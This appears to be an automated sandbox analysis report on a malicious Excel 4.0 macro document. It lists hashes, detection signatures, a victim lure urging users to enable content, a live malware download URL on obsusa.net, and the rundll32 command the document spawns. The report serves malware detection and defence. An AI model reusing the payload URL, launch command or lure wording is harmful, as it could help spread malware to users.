Loading ...

Play interactive tourEdit tour

Analysis Report e1df57de_by_Libranalysis.xls

Overview

General Information

Sample Name:e1df57de_by_Libranalysis.xls
Analysis ID:403717
MD5:e1df57deebdfeab450bf91049acff902
SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6296 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6456 cmdline: rundll32 ..\qqjdkdl.obp,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
e1df57de_by_Libranalysis.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x16663:$e1: Enable Editing
  • 0x163ad:$e3: Enable editing
  • 0x1647f:$e4: Enable content

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\qqjdkdl.obp,StartW, CommandLine: rundll32 ..\qqjdkdl.obp,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6296, ProcessCommandLine: rundll32 ..\qqjdkdl.obp,StartW, ProcessId: 6456
Sigma detected: System File Execution Location AnomalyShow sources
Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\qqjdkdl.obp,StartW, CommandLine: rundll32 ..\qqjdkdl.obp,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6296, ProcessCommandLine: rundll32 ..\qqjdkdl.obp,StartW, ProcessId: 6456

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: e1df57de_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.5:49711 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: obsusa.net
Source: global trafficTCP traffic: 192.168.2.5:49711 -> 170.249.236.47:443
Source: global trafficTCP traffic: 192.168.2.5:49711 -> 170.249.236.47:443
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: obsusa.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.aadrm.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.cortana.ai
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.office.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.onedrive.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://augloop.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://augloop.office.com/v2
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cdn.entity.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://clients.config.office.net/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://config.edge.skype.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cortana.ai
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cortana.ai/api
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://cr.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dev.cortana.ai
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://devnull.onenote.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://directory.services.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://graph.windows.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://graph.windows.net/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://lifecycle.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://login.windows.local
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://management.azure.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://management.azure.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://messaging.office.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ncus.contentsync.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: e1df57de_by_Libranalysis.xlsString found in binary or memory: https://obsusa.net/chemgrcr.dll
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://officeapps.live.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://onedrive.live.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://outlook.office.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://outlook.office365.com/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://powerlift.acompli.net
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://settings.outlook.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://staging.cortana.ai
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://tasks.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://webshell.suite.office.com
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://wus2.contentsync.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: CDE88565-44BA-40AC-8A9E-1CA847469122.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownHTTPS traffic detected: 170.249.236.47:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start .^. the decryption of the doc
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: e1df57de_by_Libranalysis.xlsInitial sample: EXEC
Source: e1df57de_by_Libranalysis.xlsInitial sample: CALL
Source: e1df57de_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: e1df57de_by_Libranalysis.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engineClassification label: mal76.expl.evad.winXLS@3/7@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FD2D71DF-5D6A-4466-AA37-B3AD3EF2F3E7} - OProcSessId.datJump to behavior
Source: e1df57de_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW
Source: e1df57de_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\qqjdkdl.obp,StartW
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
